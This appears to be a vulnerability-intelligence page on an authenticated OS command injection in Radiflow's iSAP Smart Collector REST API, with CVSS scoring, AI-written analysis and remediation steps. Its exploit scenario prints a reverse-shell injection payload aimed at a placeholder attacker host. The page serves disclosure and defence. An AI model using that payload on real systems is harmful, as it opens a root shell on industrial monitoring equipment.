Severity by source
AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
REST API is network-reachable on the management interface (AV:N, AC:L), requires a valid admin token (PR:H), no user interaction, and OS command execution as admin breaks out of the web app's authorization scope (S:C) with full CIA impact.
Primary rating from Vendor (ENISA).
CVSS VectorVendor: ENISA
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
Lifecycle Timeline
2DescriptionCVE.org
The device has a webserver that exposes a REST API authenticated with a token on the management network. By exploiting an OS command injection vulnerability an authenticated attacker can send arbitrary commands to the device that are executed with administrative permissions by the underlying operating system.
AnalysisAI
OS command injection in Radiflow iSAP Smart Collector allows an authenticated attacker on the management network to execute arbitrary commands with administrative (root-equivalent) privileges on the underlying operating system via the device's token-authenticated REST API. The CVSS 9.1 score reflects scope-changed impact across confidentiality, integrity, and availability, which is significant given the device's role as an OT/ICS data collector. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Exploitation requires (1) network reachability to the iSAP Smart Collector's management network where its REST API web server is exposed - not the OT/data-collection interface - and (2) possession of a valid administrative API bearer token, since the description and CVSS PR:H both confirm the affected endpoint is authenticated. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | Real-world risk is high but conditional. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An attacker who has obtained a valid management API token - for example via a phishing-stolen operator credential, a leaked integration token in a backup, or lateral movement from a compromised engineering workstation that already speaks to the collector - sends a crafted REST API request whose parameter value contains shell metacharacters such as `; bash -i >& /dev/tcp/attacker/443 0>&1`. The underlying OS executes the injected command with administrative privileges, giving the attacker a root-level foothold on the OT monitoring appliance, from which they can disable telemetry, tamper with forwarded data to hide further intrusion, or pivot deeper into the segmented OT network. … |
| Remediation | No vendor-released patch identified at time of analysis in the provided data, so operators should consult Radiflow PSIRT directly and monitor the CVCN advisory at https://www.cvcn.gov.it/cvcn/cve/CVE-2026-22313 for a fixed firmware version. … Detailed patch versions, workarounds, and compensating controls in full report. |
Recommended ActionAI
Within 24 hours: Restrict iSAP Smart Collector management network access using firewall rules and VLANs to approved administrative stations only; require out-of-band management channels (serial console or separate management network) where possible. …
Sign in for detailed remediation steps and compensating controls.
Threat intelligence, references, and detailed analysis are available after sign-in.
More in Isap Smart Collector
View allSame weakness CWE-78 – OS Command Injection
View allSame technique Command Injection
View allShare
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-37206
GHSA-rvj8-j4f2-ffj6